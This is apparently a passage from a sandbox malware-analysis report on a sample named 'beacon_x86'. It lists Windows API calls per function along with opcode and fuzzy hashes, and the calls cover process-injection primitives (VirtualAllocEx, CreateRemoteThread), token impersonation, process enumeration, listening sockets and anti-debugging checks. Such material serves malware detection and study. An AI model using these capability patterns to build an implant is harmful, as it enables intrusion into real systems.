            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeap_malloc
          • String ID:
          • API String ID: 501242067-0
          • Opcode ID: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
          • Instruction ID: 0ff5f4701e55d27c25babaa7c6418e27156539a1d97ae2de7537121c3109e276
          • Opcode Fuzzy Hash: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
          • Instruction Fuzzy Hash: 9DE04F7220C6014FDB288F2DF841616B7F1DB84320B64CE3EE09EC7384EA34D4818B24
          APIs
          • VirtualProtect.KERNELBASE(00000000,00000000,00000020,00000004,00000000), ref: 0081A9C8
          Memory Dump Source
          • Source File: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_3_810000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
          • Instruction ID: 67c5f870e2311bd8d0af251e341dd0037458a12838dbef27e78df0b8f906463b
          • Opcode Fuzzy Hash: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
          • Instruction Fuzzy Hash: 50E01A3150160DEBDB18CE44D848BAA37ADFF44711F008159FD2886180D775EE90CB92
          APIs
          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00D793C6,?), ref: 00D7969F
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateHeap
          • String ID:
          • API String ID: 10892065-0
          • Opcode ID: 8a49b8f029fa038cd20e7c0d831e851941ecee2e0192c253f658302655be86d5
          • Instruction ID: a35e2ed5f6f25b585451f9ec5e7325d9e1e044da5402d224d0d641135ff4bf7b
          • Opcode Fuzzy Hash: 8a49b8f029fa038cd20e7c0d831e851941ecee2e0192c253f658302655be86d5
          • Instruction Fuzzy Hash: 7BD05E725503045FEB106F757C08B263BDCD784395F148536B94CCA260F774D540C624
          APIs
          • Sleep.KERNEL32(?,00D9B1B4,?,00D606A0,00D9B1B4), ref: 00D644FB
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: b2ed2b74303583b4dab8206f14adc64e874ac9ccaecadc58e93a77b477276405
          • Instruction ID: 152a9857a4b91f93e1044833a745cc6512d99e483c2258ed95e7c9fb90902414
          • Opcode Fuzzy Hash: b2ed2b74303583b4dab8206f14adc64e874ac9ccaecadc58e93a77b477276405
          • Instruction Fuzzy Hash: 17F0FE31610306EBEB149F66FC0AB287BA5EF44314F08451BE915C9261DB76D4908A76
          APIs
            • Part of subcall function 00401805: GetTickCount.KERNEL32 ref: 0040180B
            • Part of subcall function 00401805: sprintf.MSVCRT ref: 00401875
            • Part of subcall function 00401805: CreateThread.KERNELBASE ref: 004018A9
          • Sleep.KERNELBASE(?,00401386,?,0000165A,00401386), ref: 00402A09
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CountCreateSleepThreadTicksprintf
          • String ID:
          • API String ID: 2384577035-0
          • Opcode ID: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
          • Instruction ID: afb1948537415933b36a4db080653cee2dd393a0534abb60b1e029c31af3872c
          • Opcode Fuzzy Hash: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
          • Instruction Fuzzy Hash: 90D05EB1408704AAC6003FB5C90A71ABAA8AB05351F01063CF9C1251E1DF7950108B7B
          APIs
          • _malloc.LIBCMT ref: 00D64237
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D64243
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
          • _strncmp.LIBCMT ref: 00D64292
          • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 00D642A0
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          • FindFirstFileA.KERNEL32(00000000,?), ref: 00D642D1
          • GetLastError.KERNEL32 ref: 00D642DE
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6432A
          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D6433A
          • FindNextFileA.KERNEL32(00000000,00000010), ref: 00D643CD
          • FindClose.KERNEL32(00000000), ref: 00D643DC
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
          • String ID:
          • API String ID: 2804257087-0
          • Opcode ID: 1a9ea5fa1bd2019dec58473d4539244ec685887a1242cbd4d441e7ca6f5e992e
          • Instruction ID: fe05d9d347cc95e75935afcd7a1088275bc974c6e5c7adcce240314491dcc90a
          • Opcode Fuzzy Hash: 1a9ea5fa1bd2019dec58473d4539244ec685887a1242cbd4d441e7ca6f5e992e
          • Instruction Fuzzy Hash: 735121B2904229ABDB10EBE5DC46EFF7BBCEF48714F044526F515E2181FA38994487B1
          APIs
          • _memset.LIBCMT ref: 00D69504
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
          • GetCurrentProcess.KERNEL32 ref: 00D6954F
          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D69583
          • Process32First.KERNEL32(00000000,?), ref: 00D695A5
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
          • Process32Next.KERNEL32(00000000,00000128), ref: 00D69688
            • Part of subcall function 00D69477: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00D69484
          • ProcessIdToSessionId.KERNEL32(?,?,00000000,?,00000002,00000000), ref: 00D69629
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
          • String ID: x86
          • API String ID: 3674674043-2105985432
          • Opcode ID: 3e5213d4254ca2ad1ed9322e2c83783dcf57511a393567871d369b241167038b
          • Instruction ID: 5abfffbe9ec49282b2b50f55b9c4b48f60a43a15d9cf1807301c8ed29df4eb7f
          • Opcode Fuzzy Hash: 3e5213d4254ca2ad1ed9322e2c83783dcf57511a393567871d369b241167038b
          • Instruction Fuzzy Hash: 6D51647290420DAFDF11ABE4DC56AEFBBBCDF04324F144066F504E2191EA35DA458BB1
          APIs
          • _malloc.LIBCMT ref: 00D6971B
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • __snprintf.LIBCMT ref: 00D6972C
          • FindFirstFileA.KERNEL32(00000000,00D640C9,?,00D697FD,00D640C9,?,Function_0000404D), ref: 00D69739
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          • _malloc.LIBCMT ref: 00D69778
          • __snprintf.LIBCMT ref: 00D6978D
            • Part of subcall function 00D696D1: _malloc.LIBCMT ref: 00D696DC
            • Part of subcall function 00D696D1: __snprintf.LIBCMT ref: 00D696F0
          • FindNextFileA.KERNEL32(000000FF,00D640C9,?,?,?,?,?,?,?), ref: 00D697BA
          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00D697C7
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
          • String ID:
          • API String ID: 1254174322-0
          • Opcode ID: 7ae800f8f7ca239d697f2c5c2412b7c2d27ae9740c1b11ea2a813ecb56f58f33
          • Instruction ID: 9bf500bef607e3865a486011243465e94abff7c89eb587c3166d91fb8b6c0a1b
          • Opcode Fuzzy Hash: 7ae800f8f7ca239d697f2c5c2412b7c2d27ae9740c1b11ea2a813ecb56f58f33
          • Instruction Fuzzy Hash: E621D432500208BFDF106F65DC46EAF7F6DEF407A0F188424F908AA251EB719D119BB0
          APIs
          • htonl.WS2_32 ref: 00D676B6
          • htons.WS2_32(?), ref: 00D676C6
          • socket.WS2_32(00000002,00000002,00000000), ref: 00D676DC
          • closesocket.WS2_32(00000000), ref: 00D676E9
          • bind.WS2_32(00000000,?,00000010), ref: 00D67717
          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00D6772E
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonlhtonsioctlsocketsocket
          • String ID:
          • API String ID: 3910169428-0
          • Opcode ID: 7eee199c1df9704397a767e7b71d60c6dc490ab706b5d27d40ef60f388b2b66e
          • Instruction ID: f6cf145709da2ff18871a9459446b7c9c2d5edf4dfaf19a296e47a72fb835b3e
          • Opcode Fuzzy Hash: 7eee199c1df9704397a767e7b71d60c6dc490ab706b5d27d40ef60f388b2b66e
          • Instruction Fuzzy Hash: 77118271E04318ABD710ABF89C86FAEB7ACDF08328F104576F615E61D2E6748A448779
          APIs
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D675CF
          • htons.WS2_32(?), ref: 00D675EB
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D67604
          • closesocket.WS2_32(00000000), ref: 00D6760F
          • bind.WS2_32(00000000,?,00000010), ref: 00D6761D
          • listen.WS2_32(00000000,?), ref: 00D6762B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonsioctlsocketlistensocket
          • String ID:
          • API String ID: 1767165869-0
          • Opcode ID: 1a5fbea06e6dcdbe32b71fe057f8202171499a847ca27e59381a15445f3d4107
          • Instruction ID: 20f69773217e604c9ca90e1c4ea047b0c84273bbea2ff7ab96d31cb5c695346c
          • Opcode Fuzzy Hash: 1a5fbea06e6dcdbe32b71fe057f8202171499a847ca27e59381a15445f3d4107
          • Instruction Fuzzy Hash: 0C01753560462CB7DB22BBE88C45EEEBB29DF41764F240152F945E6191E730CA4187FA
          APIs
          • IsDebuggerPresent.KERNEL32 ref: 00D831AD
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D831C2
          • UnhandledExceptionFilter.KERNEL32(00D8AC2C), ref: 00D831CD
          • GetCurrentProcess.KERNEL32(C0000409), ref: 00D831E9
          • TerminateProcess.KERNEL32(00000000), ref: 00D831F0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
          • String ID:
          • API String ID: 2579439406-0
          • Opcode ID: 2eab42f065c8d9b406cb0d21b1cf4b37558d13e6cb7d25a63a30f4a5b4d94363
          • Instruction ID: e821463a461864af7ea79be3aa11b57acf09e0b635b9c905ee88f659ca294892
          • Opcode Fuzzy Hash: 2eab42f065c8d9b406cb0d21b1cf4b37558d13e6cb7d25a63a30f4a5b4d94363
          • Instruction Fuzzy Hash: E021CDB4822304AFD710DF68FE896543BB8FB48724F12101BEA08C6360E7B459868F35
          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
          • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
          • GetCurrentProcess.KERNEL32 ref: 00401AC8
          • TerminateProcess.KERNEL32 ref: 00401AD9
          • abort.MSVCRT ref: 00401AE2
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
          • String ID:
          • API String ID: 520269711-0
          • Opcode ID: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
          • Instruction ID: 4cf10dc5dd0b46c0d15535f06df006338fe5ac01ee9545680c35680ef873d5b5
          • Opcode Fuzzy Hash: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
          • Instruction Fuzzy Hash: C71104B8904701CFC700EF79E98860ABBF0BB48305F418939E98897362E774D944CF5A
          APIs
          • GetSystemTimeAsFileTime.KERNEL32 ref: 004019DF
          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 004019F0
          • GetCurrentThreadId.KERNEL32 ref: 004019F8
          • GetTickCount.KERNEL32 ref: 00401A00
          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 00401A0F
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
          • String ID:
          • API String ID: 1445889803-0
          • Opcode ID: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
          • Instruction ID: f91986c62e855f646c45f311636352fb5b7618295fe1daaf99d33dd895697f3e
          • Opcode Fuzzy Hash: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
          • Instruction Fuzzy Hash: 72112EB56093008BD710DF7AE9CC64BBBE0FB88355F150C3AE545C6720EA35D849CB96
          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
          • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
          • GetCurrentProcess.KERNEL32 ref: 00401AC8
          • TerminateProcess.KERNEL32 ref: 00401AD9
          • abort.MSVCRT ref: 00401AE2
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
          • String ID:
          • API String ID: 520269711-0
          • Opcode ID: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
          • Instruction ID: 06684be4768ddce2bfe548fce248f846a3560142eb51a47cff2d5cf3969212e5
          • Opcode Fuzzy Hash: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
          • Instruction Fuzzy Hash: 721117B9900701CFD700EF79E94864A7BF0BB09302F418979E94897362E774E844CF5A
          APIs
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D6DDC5
          • closesocket.WS2_32(00000000), ref: 00D6DDD2
          • htons.WS2_32(?), ref: 00D6DDE3
          • bind.WS2_32(00000000,?,00000010), ref: 00D6DDFA
          • listen.WS2_32(00000000,00000078), ref: 00D6DE0B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonslistensocket
          • String ID:
          • API String ID: 564772725-0
          • Opcode ID: a5f51f7cef3f69adc9f0af0c7793cb01938f0fc950a8fbcce7c7f4eb00626fdc
          • Instruction ID: 3cd7b48935b7193c558bb743db4429f43367961e4c3f10eb1bb00aafd1a1e266
          • Opcode Fuzzy Hash: a5f51f7cef3f69adc9f0af0c7793cb01938f0fc950a8fbcce7c7f4eb00626fdc
          • Instruction Fuzzy Hash: C4F0D134E8032477DA1077B86C06BAE32299F10330F004351F9A5AA0D3D7B1C64087FA
          APIs
            • Part of subcall function 00D6CF1C: RevertToSelf.ADVAPI32(00000100,00D6D4B0,00000000,?,?,00D609A7,?,00000000,00000000,00000000,00000100,00000100), ref: 00D6CF33
          • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,00D9F8A4), ref: 00D6D292
          • GetLastError.KERNEL32 ref: 00D6D29C
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
            • Part of subcall function 00D60864: _memset.LIBCMT ref: 00D60872
          • ImpersonateLoggedOnUser.ADVAPI32 ref: 00D6D2B6
          • GetLastError.KERNEL32 ref: 00D6D2C0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$ErrorLastUser$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
          • String ID:
          • API String ID: 3063602088-0
          • Opcode ID: b331641e81380c16dd52643e736179d59cc67ae881562d7d63670fef5f40e0ff
          • Instruction ID: 8dc69ce27b25d33ea51fbcfffb789040ad977d7e642e3e93be4cd5d144bdd22f
          • Opcode Fuzzy Hash: b331641e81380c16dd52643e736179d59cc67ae881562d7d63670fef5f40e0ff
          • Instruction Fuzzy Hash: DE3152B2904308BFEF41BFA4ED46EAB3FA9EB05745F144036F904E52A1E73589149BB1
          APIs
          • GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00D61023,00000000,000001B0,?,00000000,00000080,?,?,00D6458E,00D971B0,00000000), ref: 00D6C369
          • NtAllocateVirtualMemory.NTDLL(00000000,000001B0,00000000,00000000,00003000,00000000), ref: 00D6C384
          • VirtualAlloc.KERNEL32(00000000,00D61023,00003000,00000000,000001B0,?,?,?,?,00D61023,00000000,000001B0,?,00000000,00000080), ref: 00D6C3CA
          • VirtualAllocEx.KERNEL32(00000000,00000000,00D61023,00003000,00000000,000001B0,?,?,?,?,00D61023,00000000,000001B0,?,00000000,00000080), ref: 00D6C3D5
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$Alloc$AllocateCurrentMemoryProcess
          • String ID:
          • API String ID: 3902775219-0
          • Opcode ID: f3225af02601ea7639aff63889f2da5ca9a95b9bb0ebc04242fcfe17363879df
          • Instruction ID: c4146535a3e0c2c72f8666e04b08412e9f79a830296df52b2bf5e68025645331
          • Opcode Fuzzy Hash: f3225af02601ea7639aff63889f2da5ca9a95b9bb0ebc04242fcfe17363879df
          • Instruction Fuzzy Hash: D9214AB5860304EFDB29DF49EC498BA3BB9E755760B24911AF486D2320E730AE40CB71
          APIs
          • GetCurrentProcess.KERNEL32(00000000,?,?,00D6CEAB,00000000,00000000,000000FF,00000000,00000000,00000080,00D606C4), ref: 00D6C6A2
          • NtCreateThreadEx.NTDLL(00D606C4,001FFFFF,00000000,00000080,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00D6C6C6
          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C715
          • CreateRemoteThread.KERNEL32(00000080,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C720
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateThread$CurrentProcessRemote
          • String ID:
          • API String ID: 3122335635-0
          • Opcode ID: 9e1e7b97a0420c0161f701f64575aea9cd948f5a0187209609533c6fb648fb43
          • Instruction ID: c32b52289e240b3b334425c8aa2b48672989ca711fcbc3eb3b0321429d4d0c77
          • Opcode Fuzzy Hash: 9e1e7b97a0420c0161f701f64575aea9cd948f5a0187209609533c6fb648fb43
          • Instruction Fuzzy Hash: 8C115EB1522314EBCF359F95DD898BA7F69EB15790B286016F889C6220C7318E80DFB5
          APIs
          • GetCurrentProcess.KERNEL32(?,?,?,00D60D64,00000000,00D9EFA8,00000000,00000000,00000001,?,?,00D6CE6B,00000000,00000001,00000000,00000000), ref: 00D6C421
          • NtProtectVirtualMemory.NTDLL(00000080,00000080,00D606C4,00000000,00D606C4), ref: 00D6C43B
          • VirtualProtect.KERNEL32(00000000,00D9EFAC,00000000,00D606C4,?,?,?,00D60D64,00000000,00D9EFA8,00000000,00000000,00000001,?,?,00D6CE6B), ref: 00D6C47F
          • VirtualProtectEx.KERNEL32(00000000,00000000,00D9EFAC,00000000,00D606C4,?,?,?,00D60D64,00000000,00D9EFA8,00000000,00000000,00000001), ref: 00D6C48A
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ProtectVirtual$CurrentMemoryProcess
          • String ID:
          • API String ID: 261991438-0
          • Opcode ID: 955326eee837c9f927e054387bf5b9ddf14571f0630fd128837ef7ecf955bbd9
          • Instruction ID: dfdd8007c65dc1328c8f9c6bea9d3076d2f2b7e45365318cd2d6494bd31ab66c
          • Opcode Fuzzy Hash: 955326eee837c9f927e054387bf5b9ddf14571f0630fd128837ef7ecf955bbd9
          • Instruction Fuzzy Hash: DE114CB0A21205EFCF18CF55EC699BA3B69EB15745F14502AE486C2310DB30BA44CB31
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID: $<$abcdefghijklmnop$abcdefghijklmnop
          • API String ID: 0-3339112986
          • Opcode ID: 4f3e4aa69f00bf35dabbf4cf9034c8cc60d7e660268ef8f9a4463fa9815f5d53
          • Instruction ID: ac09b5002e7ed4c692e02336b23558f09c9701877855a033f6dc5f1b203f05ca
          • Opcode Fuzzy Hash: 4f3e4aa69f00bf35dabbf4cf9034c8cc60d7e660268ef8f9a4463fa9815f5d53
          • Instruction Fuzzy Hash: 9352E275E102198FDB08CF69C491AADBBF1EF4D310F14C16AE869AB352C234E951CFA4
          APIs
          • GetModuleHandleA.KERNEL32(00000000,?,00000000,?), ref: 00D612C8
          • LoadLibraryA.KERNEL32(00000000,?,00000000,?), ref: 00D612D3
          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D612DB
            • Part of subcall function 00D616E2: _vswprintf_s.LIBCMT ref: 00D616FE
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
          • String ID:
          • API String ID: 2092861438-0
          • Opcode ID: d1e9c36001d739648bd5b0540454e30614833800f7c735c264fc3ad004d37dfe
          • Instruction ID: 425c8e3b314130801b71c0bbd92a696c2a7b80a5d29b77ca2ceb1b27bb6735d1
